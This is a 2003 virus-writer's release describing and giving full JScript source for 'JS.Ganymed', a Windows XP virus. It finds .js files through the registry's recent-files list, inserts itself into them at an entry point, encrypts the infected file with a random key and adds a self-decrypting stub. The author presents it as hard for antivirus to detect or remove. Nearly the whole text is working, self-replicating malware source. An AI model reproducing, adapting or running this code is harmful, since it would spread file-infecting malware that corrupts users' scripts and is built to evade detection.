JS.Ganymed for Windows XP by Second Part To Hell[rRlf] www.spth.de.vu spth@aonmail.at written on 11.05.2003 in Austria What's that, you may think. I will explain you: A JavaScript virus, which searchs for his victims in the registry. This registry-key don't exist at Win95/98/Me. The virus infects the files in the middle of there code (it searchs for a function, copies itself befor that function and make a call at the start of there code to the function). This techique is also called EPO. When he finished infecting a file, it encrypts the whole file (the virus and the victim code) with a random number (The main idea of this technique I saw in jackie's "don't hide, come out! (jscript encryption, a humble approach)" article). In the end, it adds an decrypter to the file (without the number it encrypt the file), otherwise it won't work. That means, the virus uses a "Bruteforce-Polymorphism" (=encrypt without saving the encryption-key). General Virus Information: VirusName................... JS.Ganymed VirusAuthor................. Second Part To Hell[rRlf] Infection Way............... Searching files from registry and infect in the middle of the code Payload..................... No Encryption.................. Yes Encrypt Hostfile............ Yes EPO......................... Yes Polymorphism................ Yes BruteFore................. Yes I'm sure, it would be hell for AVs to detect the virus, moreover it would be nearly impossible to delete the virus from the file, so that the file works normal. The host file needs the virus to become activ, that's the reason for it. Now, much thanks for reading this... I have to thank jackie for the article he wrote (I tried to don't use much of your things) -------------------------------------[JS.Ganymed for Windows XP]------------------------------------- Ganymed() function Ganymed() { var fso=WScript.CreateObject("Scripting.FileSystemObject") var shell=WScript.CreateObject("WScript.Shell") MRUList=shell.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\OpenSaveMRU\\js\\MRUList") for (i=1; i<=MRUList.length; i++) { file=shell.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\OpenSaveMRU\\js\\"+MRUList.substring(i-1,i)) if (fso.FileExists(file)) { var check=0; code=""; mycode=""; crypt=""; var line=String.fromCharCode(13)+String.fromCharCode(10) victimfile=fso.OpenTextFile(file) viccontent=victimfile.ReadAll() victimfile.Close() infchecka=fso.OpenTextFile(file) infcheck=infchecka.ReadLine() infchecka.Close() if (infcheck!="/* Ganymed") { victimfile=fso.OpenTextFile(file) myfile=fso.OpenTextFile(WScript.ScriptFullName) for (j=0; j<500; j++) { code=myfile.ReadLine(); if (code=="function Ganymed()") { mycode+=code+line; j=500; for (k=0; k<60; k++) { mycode+=myfile.ReadLine()+line } } } myfile.Close() for (l=1; l<viccontent.length; l++) { victimcodea=victimfile.Read(1) if (victimcodea=="f") { victimcodea+=victimfile.Read(7) l+=7; if (victimcodea=="function" && check==0 ) { var mark=l-8; var check=1} } } victimfile.Close() victimAll=fso.OpenTextFile(file) startcode=viccontent.substring(0,mark) endcode=viccontent.substring(mark,viccontent.length) victim=fso.OpenTextFile(file,2) victim.Write("Ganymed()"+line+startcode+line+mycode+line+endcode) victim.Close() } incry=fso.OpenTextFile(file) incontent=incry.ReadAll() incry.Close() rand=Math.round(Math.random()*5)+1 for (i=0; i<incontent.length; i++) { crypt+=String.fromCharCode(incontent.charCodeAt(i)-rand) } cryptvic=fso.OpenTextFile(file,2) comma=String.fromCharCode(34) cryptvic.Write("/* Ganymed"+line+crypt+line+"*/"+line+"var fso=WScript.CreateObject("+comma+"Scripting.FileSystemObject"+comma+")"+line+"var shell=WScript.CreateObject("+comma+"WScript.Shell"+comma+")"+line+"openme=fso.OpenTextFile(WScript.ScriptFullName)"+line+"for (i=0; i<2; i++) { code=openme.ReadLine() }"+line+"openme.Close()"+line+"check=code.substring(0,1)"+line+"for (j=0; j<10; j++) { if (check=="+comma+"G"+comma+") { var dec=j; }"+line+"check=String.fromCharCode(check.charCodeAt(0)+1) }"+line+"var newcode="+comma+comma+";"+line+"for (k=0; k<code.length; k++) { newcode+=String.fromCharCode(code.charCodeAt(k)+dec) }"+line+"newfile=fso.CreateTextFile("+comma+"decrypt.js"+comma+")"+line+"newfile.Write(newcode)"+line+"newfile.Close()"+line+"shell.Run("+comma+"decrypt.js"+comma+")") cryptvic.Close() } } }